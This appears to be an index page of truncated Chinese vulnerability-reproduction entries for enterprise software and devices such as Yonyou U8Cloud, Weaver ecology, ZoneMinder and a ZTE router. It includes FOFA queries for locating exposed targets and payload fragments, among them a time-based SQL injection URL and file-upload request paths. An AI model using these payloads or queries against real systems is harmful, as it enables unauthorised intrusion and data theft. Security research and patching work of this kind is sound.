0x01 漏洞名称 用友U8Cloud-RepAddToTaskAction-SQL注入 0x02 漏洞介绍 用友U8Cloud-RepAddToTaskAction接口存在SQL注入,攻击者可以通过此接口进行执行sql命令。 0x03 影响范围 用友U8Cloud 0x04 网络空间测绘查询 ti
0x01 漏洞名称 金和OA-C6-UploadFileEditorSave SQL注入 0x02 漏洞介绍 用金和OA-C6-UploadFileEditorSave.aspx接口存在SQL注入漏洞,攻击者可以通过此接口执行sql命令。 0x03 影响范围 金和OA 0x04 网络空间测绘查询 b
漏洞描述 某凌 EKP 由深圳市某凌软件股份有限公司开发,是一款面向中小企业的移动化智能办公产品。 该系统存在远程命令执行漏洞,攻击者能够借助 sysUiComponent 接口的 replaceExtend 方法,把 dataxml.jsp后台命令执行漏洞转化为前台命令执行漏洞。 影响版本 ver
0x01 漏洞名称 泛微ecology-v9-ModeDateService-SQL注入 0x02 漏洞介绍 泛微ecology-v9-ModeDateService接口存在SQL注入漏洞,攻击者可以通过此接口执行sql命令。 0x03 影响范围 泛微ecology-v9 0x04 网络空间测绘查询
Z21-1智联云采-SRM2.0-任意文件读取 漏洞描述: 智联云采 SRM2.0 runtimeLog/download 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 fofa语法: t
Z23-1ZoneMinder-视频监控系统-SQL 漏洞复现: payload: http://host:port/zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&r
Z18-1甄云-SRM云平台 -JNDI注入 漏洞复现: payload: /oauth/public/SpEL表达式/ab?username=bHM=
Z22-1正方-移动信息服务管理系统-任意文件上传 fofa语法: title=“移动信息服务管理” || body=“URL=/zftal-mobile” 漏洞复现: payload: POST /zftal-mobile/oaMobile/oaMobile_fjUploadByType.html
Z20-1ZoneMinder–SQL 漏洞描述: ZoneMinder 是一款免费、开源的闭路电视软件应用程序,专为 Linux 开发,支持 IP、USB 和模拟摄像机。 漏洞复现: payload: http://host:port/zm/index.php?sort=**if(now()=sy
Z17-1紫光-电子档案管理系统-PermissionAC 漏洞复现: payload: /Archive/ErecordOffice/openOfficeFile
Z16-1资管云–任意文件上传 漏洞复现: payload: POST /comfileup.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Fi
Z17-2紫光-电子档案管理系统-InformationLeakage 漏洞描述: 日志泄露 漏洞复现: payload: /Application/Runtime/Logs/login/24_08_14.log
Z15-3中成科-信票务管理系统-SQL 漏洞描述: 中成科信票务管理系统 TicketManager.ashx 接口处存在SQL注入漏洞复现,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一
Z15-2中成科-信票务管理系统-SQL 漏洞描述: 中成科信票务管理系统 SeatMapHandler.ashx 接口处存在SQL注入漏洞复现,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进
Z5-3致远互联-M3移动智能办公平台-反序列化RCE 漏洞描述: 致远M3 server中 mobile_portal接口处发现了fastjson反序列化漏洞,漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志
Z14-1Zyxel-NAS设备-RCE 漏洞描述: Zyxel NAS326 V5.21(AAZF.17)C0之前版本、NAS542 V5.21(ABAG.14)C0之前版本存在操作系统命令注入漏洞,该漏洞源于setCookie参数中存在命令注入漏洞,从而导致未经身份验证的远程攻击者可通过HTTP
Z15-1中成科-信票务管理系统-SQL 漏洞描述: 中成科信票务管理系统 ReserveTicketManagerPlane.ashx 接口处存在SQL注入漏洞复现,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限
Z13-1致远-互联FE协作办公平台-SQL 漏洞描述: 致远互联FE协作办公平台 codeMoreWidget.jsp接口处存在SQL注入漏洞,未经授权攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。 网
Z10-1Zkteco百傲瑞达-安防管理系统平台-反序列化RCE 漏洞描述: Zkteco 百傲瑞达安防管理系统平台存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取
Z9-1中兴-H108NS 路由器-PermissionAC 漏洞描述: 中兴H108NS路由器tools_admin.asp接口处存在身份认证绕过漏洞,攻击者可利用该漏洞绕过身份认证允许访问路由器的管理面板修改管理员密码,获取用户的敏感信息。 网络测绘: fofa语法: banner=“Basic